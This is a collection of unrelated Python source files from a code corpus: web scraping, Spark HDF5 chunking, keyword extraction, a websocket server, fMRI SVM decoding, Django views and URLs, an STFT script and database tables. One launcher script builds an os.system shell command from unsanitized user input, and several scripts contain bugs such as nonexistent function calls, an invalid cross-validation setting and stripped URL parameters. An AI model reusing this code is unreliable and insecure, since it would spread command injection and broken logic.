=\"https://astrogeology.usgs.gov\"\n try:\n image_list = hemisphere_soup.find_all('div', class_='item')\n\n # Create list to store dictionaries of data\n hemisphere_image_urls = []\n\n # Loop through list of hemispheres and click on each one to find large resolution image\n for image in image_list:\n\n # Create a dicitonary to store urls and titles\n hemisphere_dict = {}\n \n # Find link to large image\n href = image.find('a', class_='itemLink product-item')\n link = base_url + href['href']\n\n # Visit the link\n browser.visit(link)\n\n # Wait 1 second \n time.sleep(2)\n \n # Parse the html of the new page\n hemisphere_html2 = browser.html\n hemisphere_soup2 = bs(hemisphere_html2, 'lxml')\n\n # Find the title\n img_title = hemisphere_soup2.find('div', class_='content').find('h2', class_='title').text\n \n # Append to dict\n hemisphere_dict['title'] = img_title\n \n # Find image url\n img_url = hemisphere_soup2.find('div', class_='downloads').find('a')['href']\n \n # Append to dict\n hemisphere_dict['url_img'] = img_url\n \n # Append dict to list\n hemisphere_image_urls.append(hemisphere_dict)\n \n # Store hemisphere image urls to dictionary\n marsdata['hemisphere_image_urls'] = hemisphere_image_urls\n except AttributeError as e:\n print(e)\n\ndef scrape(): \n \n scrape_News()\n scrape_Weather()\n scrape_Image()\n scrape_Facts()\n scrape_Hemispheres() \n return marsdata\n ","sub_path":"Missions_to_Mars/scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":5370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"570986321","text":"import features\nfrom pyspark.sql import Row\n\nimport h5py\nimport numpy as np\nfrom itertools import product\nfrom collections import namedtuple\nfrom pyspark.sql.types import *\nfrom tomni.backend import data_path\n\nimport os\n\nImportTask = namedtuple('ImportTask', ['chunk', 'start', 'end' , 'overlap' , 'files']) \nSubVolume = namedtuple('SubVolume', ['chunk', 'channel', 'machine_labels','human_labels','affinities', 'start', 'end' , 'overlap']) \n\nclass Dataset(object):\n\n def __init__(self, sc, sqlContext):\n \"\"\"\n SparkContext is required to return rdds\n \"\"\"\n self.sc = sc\n self.sqlContext = sqlContext\n self.subvolumes = None\n self.vertices = None\n self.edges = None\n self.chunks =None\n\n if not os.path.isdir(self.files('vertices')) or not os.path.isdir(self.files('edges')):\n self._get_subvolumes()\n self.compute_voxel_features()\n self.vertices.write.parquet(self.files('vertices'))\n self.edges.write.parquet(self.files('edges'))\n else:\n # Load the vertices and edges back.\n self.vertices = self.sqlContext.read.parquet(self.files('vertices'))\n self.edges = self.sqlContext.read.parquet(self.files('edges'))\n\n\n if not os.path.exists(self.files(\"chunks\")+\"/0-0-0.json\"):\n if not os.path.exists(self.files(\"chunks\")):\n os.makedirs(self.files(\"chunks\"))\n self._get_subvolumes() \n pfs = features.PrepareForServe()\n self.subvolumes.map(pfs.map).collect()\n \n\n def get_shape(self):\n\n f = h5py.File(self.files('machine_labels'),'r')\n if 'main' not in f: \n raise ImportError(\"Main dataset doesn't exists\")\n shape = np.array(f['main'].shape)\n f.close()\n return shape\n\n def import_hdf5(self, chunk_size=64, overlap=1 ):\n \"\"\"\n This code is executed in the master node.\n It opens the hdf5 files:\n * channel images\n * machine labels ( the output from watershed )\n * human labels ( and optional segmentation created by humans)\n * affinities ( the output 
from the conv nets where watershed was ran )\n to verify they all have the right dataset with the right shape (TODO)\n It divides the dataset into chunks, which all then import in parallel by the workers.\n \"\"\"\n\n import_tasks = []\n shape = self.get_shape()\n\n n_chunks = np.ceil( shape / float(chunk_size)).astype(int)\n n_chunks = np.maximum( n_chunks , np.array([1,1,1]))\n # n_chunks = np.minimum( n_chunks, np.array([1,4,4]))\n\n for chunk in product(*list(map(range,n_chunks))):\n\n start = np.maximum(np.array(chunk) * chunk_size, np.array([0,0,0]))\n end = np.minimum((np.array(chunk) + 1) * chunk_size + overlap, shape)\n chunk_overlap = (end != shape) * overlap\n\n files = { 'channel': self.files('channel'),\n 'machine_labels': self.files('machine_labels'),\n 'human_labels': self.files('human_labels'),\n 'affinities': self.files('affinities')}\n it = ImportTask( chunk , start, end , chunk_overlap , files)\n import_tasks.append(it)\n \n return import_tasks\n\n @staticmethod\n def _get_subvolume( it ):\n \"\"\"\n This code is executed by the worker, it runs an ImportTask which was created by\n import_hdf5.\n\n This method has to be static, because the class has a copy of the sparkContext\n which cannot be referenced by any worker.\n \"\"\"\n\n data = {}\n for h5file in ['channel','machine_labels', 'human_labels' , 'affinities']:\n f = h5py.File(it.files[h5file],'r')\n if 'main' not in f:\n raise ImportError(\"Main dataset doesn't exists\")\n\n if h5file == 'affinities':\n chunk_data = f['main'][:,\n it.start[0]:it.end[0],\n it.start[1]:it.end[1],\n it.start[2]:it.end[2]]\n else:\n chunk_data = f['main'][it.start[0]:it.end[0],\n it.start[1]:it.end[1],\n it.start[2]:it.end[2]]\n\n data[h5file] = chunk_data\n\n sv = SubVolume(it.chunk,\n data['channel'],\n data['machine_labels'],\n data['human_labels'],\n data['affinities'],\n it.start,\n it.end,\n it.overlap)\n return sv\n\n def _get_subvolumes(self):\n\n if self.subvolumes != None:\n return self.subvolumes\n \n volumes = self.import_hdf5()\n volumes = self.sc.parallelize(volumes)\n self.subvolumes = volumes.map(self._get_subvolume)\n \n def compute_voxel_features(self):\n \n def to_row( data ):\n return map(int,data)\n\n cr = features.ContactRegion()\n adjcency = self.subvolumes.flatMap(cr.map).reduceByKey(cr.reduce)\n edges = []\n for edge, voxels in adjcency.toLocalIterator():\n affinities_sum = float( np.sum([pair[1] for pair in voxels]) )\n contact_region_size = len(voxels)\n\n #The src should always be an smaller id that the dst\n if edge[0] > edge[1]:\n edge[0] , edge[1] = edge[1] , edge[0]\n \n edges.append( edge + (affinities_sum, contact_region_size) )\n\n \n self.edges = self.sqlContext.createDataFrame(edges, ['src','dst','affinities_sum','contact_region_size'])\n ss = features.SegmentSize()\n sizes = self.subvolumes.flatMap(ss.map).reduceByKey(ss.reduce).map(to_row).toDF(['id','size'])\n self.vertices = sizes\n\n\n # m = features.Mesh()\n # meshes = self.subvolumes.flatMap(m.map).reduceByKey(m.reduce).map(to_row).toDF(['id','meshes'])\n # vertices = sizes.join(meshes, 'id')\n # self.vertices = vertices\n\n # vertices.saveAsTable( tableName='vertices', mode='overwrite', path=self.files('vertices') )\n #nx.write_gpickle(self.g.g , self.files('graph'))\n return\n\n @staticmethod\n def files(file):\n production = False\n\n if production:\n \n files = {\n 'machine_labels': 's3://agglomeration/snemi3d_ds_test/machine_labels.h5',\n 'human_labels': 's3://agglomeration/snemi3d_ds_test/human_labels.h5',\n 'affinities': 
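# [Editor's sketch] The chunk-grid arithmetic from import_hdf5() above, reduced
# to pure NumPy so it can be sanity-checked without HDF5 or Spark; the shape
# and parameters here are illustrative.
import numpy as np
from itertools import product

shape = np.array([100, 100, 100])
chunk_size, overlap = 64, 1
n_chunks = np.maximum(np.ceil(shape / float(chunk_size)).astype(int), 1)

for chunk in product(*map(range, n_chunks)):
    start = np.maximum(np.array(chunk) * chunk_size, 0)
    end = np.minimum((np.array(chunk) + 1) * chunk_size + overlap, shape)
    chunk_overlap = (end != shape) * overlap  # no overlap at the volume border
    print(chunk, start, end, chunk_overlap)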
's3://agglomeration/snemi3d_ds_test/affinities.h5',\n 'adjcency':'s3://agglomeration/snemi3d_ds_test/adjcency',\n 'sizes': 's3://agglomeration/snemi3d_ds_test/sizes',\n 'meshes':'s3://agglomeration/snemi3d_ds_test/meshes',\n 'vertices': 's3://agglomeration/snemi3d_ds_test/vertices',\n 'graph': 's3://agglomeration/snemi3d_ds_test/graph'\n }\n\n else:\n\n files = {\n 'channel': data_path+'/small_ch_dr5.h5',\n 'machine_labels': data_path+'/small_ml_dr5.h5',\n 'human_labels': data_path+'/small_ml_dr5.h5',\n 'affinities': data_path+'/small_aff_dr5.h5',\n 'chunks': data_path+'/chunks',\n 'vertices': data_path+'/vertices',\n 'edges': data_path+'/edges'\n }\n \n return files[file]","sub_path":"tomni/backend/graph/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":6832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"53291612","text":"# -*- coding: utf-8 -*-\n__author__ = 'duyongan'\n__date__ = '2018/6/28 10:01'\nimport jieba\njieba.initialize()\nimport re\nimport jieba.posseg as pseg\nimport networkx as nx\nfrom pylab import *\nmpl.rcParams['font.sans-serif'] = ['SimHei']\nimport numpy as np\nimport collections\nimport nltk\n\nclass analyse:\n def __init__(self,text,lang,stopwords,idf_map,my_dict):\n self.stopwords=stopwords\n self.idf_map=idf_map\n self.dict=my_dict\n # self.text = text\n self.lang = lang\n text=''.join([t for t in text.split('\\n') if len(t)>4])\n text = text.replace('\\n', '').replace('\\u3000', '').replace('?”', '”').replace('!”', '”').replace('。”', '”')\n if lang=='zh':\n text=re.sub('(.*?)', '', text)\n sentences = re.split(r\"([。!?……])\", text)\n sentences.append('')\n self.sentences = [\"\".join(i) for i in zip(sentences[0::2], sentences[1::2])]\n # 分词\n sentences2=[]\n for sentence in self.sentences:\n words =[tuple_ for tuple_ in list(pseg.cut(sentence))if list(tuple_)[0].strip()]\n words2=[]\n temp=''\n enstart=False\n for i in range(len(words)):\n if words[i].flag in ['n','nd','nh','ni','nl','ns','nt','nz','vn','nr','nrf','nsf','ng','nrj','nr1','nr2'] and len(temp)<=4 and not enstart:\n if words[i].word not in self.stopwords:\n temp=temp+words[i].word\n if i==len(words)-1:\n if temp.strip()!='':\n words2.append(temp)\n else:\n if temp.strip()!='' and not enstart:\n words2.append(temp)\n temp=''\n if words[i].flag=='eng':\n en_word=nltk.pos_tag([words[i].word])[0][1]\n if en_word in ['NN','NNS','NNP','NNPS'] and words[i].word not in self.stopwords:\n if enstart:\n if len(temp.strip().split()) > 2 or temp.strip().isupper() and temp.strip() not in self.stopwords:\n words2.append(temp.strip())\n temp=''\n if temp:\n temp+=' '+words[i].word.strip()\n else:\n temp = words[i].word.strip()\n else:\n temp=words[i].word.strip()\n enstart=True\n try:\n if words[i+1].flag!='eng':\n if len(temp.strip().split())>2 or temp.strip().isupper() and temp.strip() not in self.stopwords:\n words2.append(temp.strip())\n enstart=False\n temp=''\n except:\n words2.append(temp.strip())\n enstart = False\n temp=''\n\n if i+1 2 or temp.strip().isupper() and temp.strip() not in self.stopwords :\n words2.append(temp.strip())\n enstart = False\n temp = ''\n else:\n if temp:\n if len(temp.strip().split()) > 2 or temp.strip().isupper() and temp.strip() not in self.stopwords:\n words2.append(temp.strip())\n enstart = False\n temp = ''\n sentences2.append(words2)\n elif lang=='en':\n text = re.sub('\\(.*?\\)', '', text)\n sentences = re.split(r\"([.?!…])\", text)\n sentences.append('')\n self.sentences = [\"\".join(i) for i 
in zip(sentences[0::2], sentences[1::2])]\n sentences2=[]\n for sentence in self.sentences:\n words =list(nltk.pos_tag(sentence.split()))\n words2=[]\n temp=''\n for i in range(len(words)):\n if words[i][1] in ['NN','NNS','NNP','NNPS'] and len(temp.split())<=4 and words[i][0] not in self.stopwords:\n if temp:\n temp=temp.strip()+' '+words[i][0].strip()\n else:\n temp=words[i][0].strip()\n if i==len(words)-1:\n if len(temp.strip().split()) > 2 or temp.strip().isupper() and temp not in self.stopwords :\n words2.append(temp)\n else:\n if len(temp.strip().split()) > 2 or temp.strip().isupper() and temp not in self.stopwords :\n words2.append(temp)\n temp=''\n sentences2.append(words2)\n else:\n return []\n #去停用词和单字\n self.sentences3=[]\n for sentence in sentences2:\n sentence2=[]\n for word in sentence:\n if word in self.stopwords:\n pass\n elif len(word)<=2:\n pass\n else:\n sentence2.append(word)\n if len(sentence2)>1:\n self.sentences3.append(sentence2)\n\n #单字词频统计\n def flatten(x):\n result = []\n for el in x:\n if isinstance(x, collections.Iterable) and not isinstance(el, str):\n result.extend(flatten(el))\n else:\n result.append(el)\n return result\n word_map={}\n word_list=flatten(self.sentences3)\n for word in list(set(word_list)):\n word_map[word]=word_list.count(word)\n #词对频数统计\n word2word_map={}\n word2word=[]\n for sentence in self.sentences3:\n for i in range(len(sentence)):\n for j in range(i+1,len(sentence)):\n alist=[]\n alist.append(sentence[i])\n alist.append(sentence[j])\n alist=sorted(alist)\n word2word.append('_'.join(alist))\n for w2w in list(set(word2word)):\n word2word_map[w2w]=word2word.count(w2w)\n\n #计算共现网络权重\n word2word_weight={}\n for w2w in list(set(word2word)):\n word2word_weight[w2w]=(word2word_map[w2w]/word_map[w2w.split('_')[0]]+word2word_map[w2w]/word_map[w2w.split('_')[1]])*0.5\n\n #共现网络可视化\n G=nx.Graph()\n word_list2=[]\n for word in list(set(word_list)):\n word=unicode(word.encode(\"utf-8\"),'utf-8')\n word_list2.append(word)\n G.add_nodes_from(word_list2)\n for w2w in word2word_weight.keys():\n G.add_edge(unicode(w2w.split('_')[0].encode(\"utf-8\"),'utf-8'),unicode(w2w.split('_')[1].encode(\"utf-8\"),'utf-8'),weight=word2word_weight[w2w])\n word_map2=[]\n for word in G.nodes:\n word_map2.append((word,word_map[word]))\n fre=[]\n idf_num=[]\n max_idf_num=max(self.idf_map.values())\n for flu in word_map2:\n fre.append(flu[1])\n try:\n idf_num.append(self.idf_map[flu[0]])\n except:\n idf_num.append(max_idf_num)\n fre=np.array(fre)\n idf_num=np.array(idf_num)\n try:\n pr1=np.array(list(nx.degree_centrality(G).values()))\n except:\n pr1=np.zeros(len(word_list2))\n try:\n pr2=np.array(list(nx.eigenvector_centrality(G).values()))\n except:\n pr2=np.zeros(len(word_list2))\n try:\n pr3=np.array(list(nx.betweenness_centrality(G).values()))\n except:\n pr3=np.zeros(len(word_list2))\n pr4=fre\n weight_=list((0.1*pr1/max(0.001,sum(pr1))+0.1*pr2/max(0.001,sum(pr2))+0.5*pr3/max(0.001,sum(pr3))+0.3*pr4*idf_num/max(0.001,sum(pr4))))\n for i,word in enumerate(G.nodes):\n if word.isupper():\n weight_[i] = weight_[i] * 0.25\n if word in self.dict:\n weight_[i] = weight_[i] * 10\n self.keywords=dict(zip(G.nodes,weight_))\n\n def getKeywords(self,num_of_keywords):\n keywords = sorted(self.keywords.items(), key=lambda k: k[1],reverse=True)\n keywords=keywords[:min(num_of_keywords,len(keywords)-1)]\n keywords=[term[0] for term in keywords]\n return keywords\n\n\n def getAbstract(self,num_of_abstract):\n sentences_score = {}\n for i,sentence in enumerate(self.sentences3):\n 
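# [Editor's sketch] The sentence-splitting idiom used twice in analyse.__init__
# above: re.split with a capturing group keeps each terminator, and zipping the
# even/odd slices glues every sentence back onto its punctuation. Note the
# trailing empty string, which the class later filters by length.
import re

text = "第一句。第二句!第三句?"
parts = re.split(r"([。!?……])", text)
parts.append("")
sentences = ["".join(pair) for pair in zip(parts[0::2], parts[1::2])]
print(sentences)  # ['第一句。', '第二句!', '第三句?', '']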
sentence_score = 0\n if len(sentence) > 0:\n for word in sentence:\n sentence_score += self.keywords[word]\n sentences_score[i] = sentence_score / len(sentence)\n if i==0 or i==len(self.sentences3)-1:\n sentences_score[i] =sentences_score[i] *10\n if len(self.sentences[i])>50:\n sentences_score[i] = 0.01*sentences_score[i]\n else:\n sentences_score[i] =0\n sentences_score = sorted(sentences_score.items(), reverse=True, key=lambda k: k[1])\n results = []\n for sentence_num in sorted(sentences_score[:num_of_abstract]):\n sentence = ''\n seq = re.split('([,;])', self.sentences[sentence_num[0]])\n seq.append('')\n seq = [\"\".join(i) for i in zip(seq[0::2], seq[1::2])]\n for sen in seq:\n words = list(jieba.cut(sen))\n words2 = []\n for word in words:\n if word in self.stopwords:\n pass\n elif len(word) <= 1:\n pass\n else:\n words2.append(word)\n if len(sen) <= 4:\n __if_useful = False\n word_flags = pseg.lcut(sen)\n for word_flag in word_flags:\n if word_flag.flag in ['n', 'nd', 'nh', 'ni', 'nl', 'ns', 'nt', 'nz', 'vn', 'nr', 'nrf', 'nsf',\n 'ng', 'nrj', 'nr1', 'nr2']:\n __if_useful = True\n break\n if __if_useful:\n if sentence != '':\n sentence = sentence + sen\n elif len(words2) == 0:\n pass\n else:\n if sentence != '':\n sentence = sentence + sen\n else:\n sentence = sentence + sen\n results.append(sentence)\n return ''.join(results)","sub_path":"analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":11446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"401975363","text":"import asyncio\nimport websockets\nimport json\n\nclass WebSoketRunner:\n def __init__(self, engine: object, logger: object):\n self.engine = engine()\n self.logger = logger\n\n async def consumer(self, message):\n output_list = json.loads(message)\n self.logger.debug(f'INPUT json: {output_list}')\n # engine = self.engine.pwm_controller(manage_list=output_list)\n self.engine.pwm_controller(manage_list=output_list)\n\n\n async def websocket_server(self, websocket, path):\n async for message in websocket:\n await self.consumer(message)\n\n def start(self):\n start_server = websockets.serve(self.websocket_server, \"127.0.0.1\", 5685)\n asyncio.get_event_loop().run_until_complete(start_server)\n asyncio.get_event_loop().run_forever()\n","sub_path":"pwm_manage/websocketruner.py","file_name":"websocketruner.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"209163769","text":"\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport os\nimport numpy as np\nimport nilearn\nimport glob\nimport nibabel as nib\nimport pandas as pd\nfrom nilearn.image import concat_imgs, index_img, smooth_img\nfrom nilearn.image import resample_to_img\n#from nilearn import plotting\nfrom nilearn.input_data import NiftiMasker\nfrom sklearn.svm import SVC\nfrom sklearn.cross_validation import LeaveOneLabelOut\nfrom sklearn.model_selection import cross_val_score, permutation_test_score\nfrom sklearn.feature_selection import SelectKBest, f_classif\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.grid_search import GridSearchCV\nfrom nilearn import image\nfrom nilearn.plotting import plot_stat_map, show\nfrom sklearn.dummy import DummyClassifier\n\n\n\nbasepath=os.path.join('/projects','niblab','data','eric_data','W1','imagine')\noutpath = \"/projects/niblab/nilearn_projects\"\n\nfmri_subjs=os.path.join(outpath, 
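# [Editor's sketch] A matching client for the WebSoketRunner above, assuming
# the server from websocketruner.py is listening on 127.0.0.1:5685 and expects
# a JSON list; the payload shape here is hypothetical.
import asyncio
import json
import websockets

async def send_manage_list(manage_list):
    async with websockets.connect("ws://127.0.0.1:5685") as ws:
        await ws.send(json.dumps(manage_list))

asyncio.run(send_manage_list([{"pin": 18, "duty": 50}]))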
'concatenated_imagine_67.nii')\naverage_ana=os.path.join(outpath,'CS_avg_mprage_image.nii.gz')\nimag_mask=os.path.join(outpath,'power_roimask_4bi.nii.gz')\n#plot mask (Power ROIs) over anatomical that is defined above\n#plotting.plot_roi(imag_mask,bg_img=average_ana,cmap='Paired')\n#load labels for the functional data\nstim = os.path.join('/projects','niblab','scripts','nilean_stuff','label_67_sub.csv')\n\n\nfunc_df = pd.read_csv(stim, sep=\",\")\n#Retrieve the behavioral targets, that we are going to predict in the decoding\n#y_mask = labels['labels']\n#subs = labels['subs']\ny_mask = func_df['labels']\nsubs = func_df['subs']\n\n\n# In[19]:\n\n\n\n# ---STEP 3---\n#feature selection\n#To keep only data corresponding to app food or unapp food, we create a mask of the samples belonging to the condition.\n\ncondition_mask = func_df[\"labels\"].isin(['rest', 'app'])\n#condition_mask = func_df[\"labels\"].isin(['app', 'unapp', 'H2O'])\nprint(condition_mask.shape)\n#y = y_mask[condition_mask]\ny = y_mask[condition_mask]\nprint(y.shape)\nn_conditions = np.size(np.unique(y))\nprint(n_conditions)\n#n_conditions = np.size(np.unique(y))\nprint(y.unique())\n#session = func_df[condition_mask].to_records(index=False)\n#print(session.dtype.name)\nnifti_masker = NiftiMasker(mask_img=imag_mask, smoothing_fwhm=4,standardize=True, memory_level=0)\nfmri_trans = nifti_masker.fit_transform(fmri_subjs)\nprint(fmri_trans)\nX = fmri_trans[condition_mask]\nsubs = subs[condition_mask]\n\nsvc = SVC()\nsvc = SVC(kernel='linear', verbose=False)\nprint(svc)\nfrom sklearn.feature_selection import SelectPercentile, f_classif\n#feature_selection = SelectPercentile(f_classif, percentile=10)\nfeature_selection = SelectKBest(f_classif, k=1500)\nnp.warnings.filterwarnings('ignore')\n\nanova_svc = Pipeline([('anova',feature_selection), ('svc',svc)])\n#fit the decoder and predict\nanova_svc.fit(X, y)\ny_pred = anova_svc.predict(X)\n\nk_range = [10, 15, 30, 50 , 150, 300, 500, 1000, 1500, 3000, 5000]\n#cv_scores = cross_val_score(anova_svc, X[subs ==1], y[subs ==1])\ncv_scores = []\nscores_validation = []\n\nfor k in k_range:\n feature_selection.k = k\n #anova_svc.set_params(anova__k=feat svc__C=1.0).fit(X[subs == 1], y[subs == 1])\n cv_scores.append(np.mean(cross_val_score(anova_svc, X[subs ==1], y[subs ==1])))\n print(\"CV score: %.4f\" % cv_scores[-1])\n #scores_validation.append(np.mean(y_pred == y[subs == 0]))\n #print(\"score validation: %.4f\" % scores_validation[-1])\n anova_svc.fit(X[subs ==1], y[subs == 1])\n y_pred = anova_svc.predict(X[subs == 0])\n scores_validation.append(np.mean(y_pred == y[subs == 0]))\n print(\"score validation: %.4f\" % scores_validation[-1])\n\n# we are working with a composite estimator:\n# a pipeline of feature selection followed by SVC. Thus to give the name of the parameter that we want to tune we need to give the name of the step in\n# the pipeline, followed by the name of the parameter, with ‘__’ as a separator.\n# We are going to tune the parameter 'k' of the step called 'anova' in the pipeline. Thus we need to address it as 'anova__k'.\n# Note that GridSearchCV takes an n_jobs argument that can make it go much faster\ngrid = GridSearchCV(anova_svc, param_grid={'anova__k': k_range}, n_jobs=2)\nnested_cv_scores = cross_val_score(grid, X, y)\nclassification_accuracy = np.mean(nested_cv_scores)\nprint(\"Classification accuracy: %.4f / Chance level: %f\" %\n (classification_accuracy, 1. 
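# [Editor's sketch] The 'anova__k' naming convention used by the grid search
# above ('<step name>__<parameter>'), demonstrated on synthetic data so it runs
# without the fMRI inputs; imports use the current scikit-learn module paths
# rather than the deprecated sklearn.grid_search/cross_validation seen above.
import numpy as np
from sklearn.datasets import make_classification
from sklearn.feature_selection import SelectKBest, f_classif
from sklearn.model_selection import GridSearchCV, cross_val_score
from sklearn.pipeline import Pipeline
from sklearn.svm import SVC

X, y = make_classification(n_samples=100, n_features=50, random_state=0)
pipe = Pipeline([("anova", SelectKBest(f_classif)), ("svc", SVC(kernel="linear"))])
grid = GridSearchCV(pipe, param_grid={"anova__k": [5, 10, 20]})
print(np.mean(cross_val_score(grid, X, y)))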
/ n_conditions))\n\n\n\nprint(\"SCORE VALIDATION: \", scores_validation)\nprint(\"CV Scores: \", cv_scores)\n\n# plot\nplt.plot(cv_scores, label='Cross validation scores')\nplt.plot(scores_validation, label='Left-out validation data scores')\nplt.xticks(np.arange(len(k_range)), k_range)\nplt.axis('tight')\nplt.xlabel('k')\n\nplt.axhline(np.mean(nested_cv_scores),\n label='Nested cross-validation',\n color='r')\n\nplt.legend(loc='best', frameon=False)\nplt.show()\n\n\n# ---STEP 5---\n#flipping the martix backinto an image\ncoef = svc.coef_\nprint(coef)\n\n# reverse feature selection\ncoef = feature_selection.inverse_transform(coef)\n\n# reverse masking\nweight_img = nifti_masker.inverse_transform(coef)\n#plot image\nplt.plot_stat_map(weight_img, average_ana, title='SVM weights')\nplt.show()\n\n\nfrom sklearn.dummy import DummyClassifier\nnull_cv_scoresdumb = cross_val_score(DummyClassifier(), X, y, cv=10)\nprint(null_cv_scoresdumb)\nnull_cv_scoresdumb = cross_val_score(DummyClassifier(), X, y, cv=1)\nprint(null_cv_scoresdumb)\nmeannull_cv_scoresdumb = np.mean(null_cv_scoresdumb)\nprint(meannull_cv_scoresdumb)\n","sub_path":"TheBrainPipeline/analysis/nilearn_scripts/.ipynb_checkpoints/app_vs_rest_nest-checkpoint.py","file_name":"app_vs_rest_nest-checkpoint.py","file_ext":"py","file_size_in_byte":5422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"157255905","text":"# -*- coding: utf-8 -*-\nfrom django.urls import path\n\nfrom . import views\n\n\napp_name = 'movies'\nurlpatterns = [\n path('', view=views.MovieListView.as_view(), name='index'),\n path('/',view=views.MovieDetailView.as_view(), name='detail'),\n path('create/', view=views.MovieCreateView.as_view(), name='create'),\n path('update//',view=views.MovieUpdateView.as_view(), name='update'),\n path('delete//',view=views.MovieDeleteView.as_view(), name='delete'),\n path('results/', views.SearchView.as_view(), name='search'),\n]\n","sub_path":"python-django-assessment/moviesapp/movies/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"650288989","text":"\"\"\"Provides the view of the team member widget.\"\"\"\n\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.cache import never_cache\nfrom apps.managers.team_mgr import team_mgr\nfrom apps.managers.score_mgr import score_mgr\n\n\ndef supply(request, page_name):\n \"\"\"Supply view_objects content, which is the set of team members.\"\"\"\n _ = page_name\n\n # Get the team members.\n team = request.user.get_profile().team\n if team:\n members_with_points = []\n zero_point_members = []\n for member in team_mgr.team_members(team):\n if score_mgr.player_points(member) > 0:\n members_with_points.append(member)\n else:\n zero_point_members.append(member)\n else:\n members_with_points = None\n zero_point_members = None\n\n return {\n \"team_members\": members_with_points,\n \"zero_members\": zero_point_members,\n }\n\n\n@never_cache\n@login_required\ndef team_members(request):\n \"\"\"Provide the team members.\"\"\"\n team = request.user.get_profile().team\n if team:\n members = team_mgr.team_members(team)\n else:\n members = None\n\n return render_to_response(\"team_members.html\", {\n \"team_members\": members,\n }, 
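# [Editor's note] Two apparent bugs in the decoding script above, with likely
# fixes left as comments because the variables (weight_img, average_ana, X, y)
# belong to that script:
#   - plt.plot_stat_map(...) does not exist in matplotlib; the script already
#     imports nilearn's plotting helpers, so the intent was presumably
#     plot_stat_map(weight_img, average_ana, title='SVM weights') followed by
#     show().
#   - cross_val_score(DummyClassifier(), X, y, cv=1) raises a ValueError in
#     scikit-learn, which requires cv >= 2 splits.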
context_instance=RequestContext(request))\n","sub_path":"makahiki/apps/widgets/team_members/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"187977267","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os, sys\nimport time\nfrom scipy import signal\nimport utils\n\ndata_root = \"C:/Users/TobiasToft/Documents/GitHub/ABE_Master_thesis/PythonFiles/data_test/test/333_ref.wav\"\n\nx, fs = utils.wavToSamples(data_root)\nwL = 512\n\nplt.plot(x)\n\nR = int(np.round(0.25*wL))\n\npos = np.ceil(np.log2(wL))\n\nM = int(np.power(2,pos))\n\n# window\nw = np.hanning(wL)\n\n# FFT length\nN = int(wL)\n\n# Time and frequency resolution\ndT = N/fs\ndF = fs/N\n\n# Overlap\nO = N - R\n\n# Number of frames\nL = int(np.floor( (len(x)-O)/R ))\n\n# Indexes\nidx1 = 0\nidx2 = int(N)\n\npadZeros = np.zeros(M-N)\nX_r = np.empty((M,L))\nX_i = np.empty((M,L))\nX_abs = np.empty((M,L))\n\nfor i in range(0,L):\n\n\t# Extracting frame\n x_ = x[idx1:idx2]\n\n\t# Applying window\n x_ *= np.transpose(w)\n\n\t# Zeropadding to M FFT length\n x_ = np.concatenate((x_,padZeros))\n\n\t# FFT transform and power calculation\n xFFT = np.fft.fft(x_,M)\n xFFT = 2*xFFT/M\n\n\t#print(xFFT.imag)\n X_r[:,i] = xFFT.real\n X_i[:,i] = xFFT.imag\n\n X_abs[:,i] = np.abs(xFFT)**2\n\n\t# Updating indexes\n idx1 += R\n idx2 += R\n\n# Extracting positive frequencies only\nX_r = X_r[0:int(M/2),:]\nX_i = X_i[0:int(M/2),:]\nX_abs = X_abs[int(M/2):-1,:]\n\n\n\nplt.imshow(X_abs)\n\t#return X_abs,X_r, X_i\n\n\n\nf, t, Sxx = signal.spectrogram(x, fs,nfft=512)\nplt.imshow(X_abs)\n","sub_path":"PythonFiles/Tobias_temp/stft_temp.py","file_name":"stft_temp.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"25122475","text":"#Enter a file, we check if exists and then it executes script1.py (explained in the begining of script1.py)\nimport os.path\nfileorigin= input(\"Enter a filename \\n\")\nfileoriginA=fileorigin.split('.')\nfiledestination=fileoriginA[0]+\"_OUTPUT.html\"\n\n\n\nif os.path.exists(fileorigin): #check if file exists\n os.system(\"python script1.py \"+fileorigin+\" \"+filedestination+\" \"+fileoriginA[0])#passing args when calling the script\n\nelse:\n print(\"The file doesn't exists\")","sub_path":"chScript1/script2.py","file_name":"script2.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"239829861","text":"import aiopg.sa\r\nfrom sqlalchemy import (\r\n MetaData, Table, Column, ForeignKey,\r\n Integer, String, Date, Numeric,\r\n select, and_\r\n)\r\nimport datetime as date\r\n\r\n\r\nmeta = MetaData()\r\n\r\n# Определение таблиц БД\r\nuser = Table(\r\n 'user', meta,\r\n\r\n Column('id', Integer, primary_key=True),\r\n Column('name', String(20), nullable=False),\r\n Column('surname', String(20), nullable=False),\r\n Column('fathers_name', String(20), nullable=False),\r\n Column('email', String(30), nullable=False, unique=True)\r\n)\r\n\r\nbook = Table(\r\n 'book', meta,\r\n\r\n Column('id', Integer, primary_key=True),\r\n Column('name', String(60), nullable=False),\r\n Column('author', String(30), nullable=False),\r\n Column('isbn', String(20), nullable=False, unique=True),\r\n Column('price', Numeric, nullable=False)\r\n)\r\n\r\nshop = 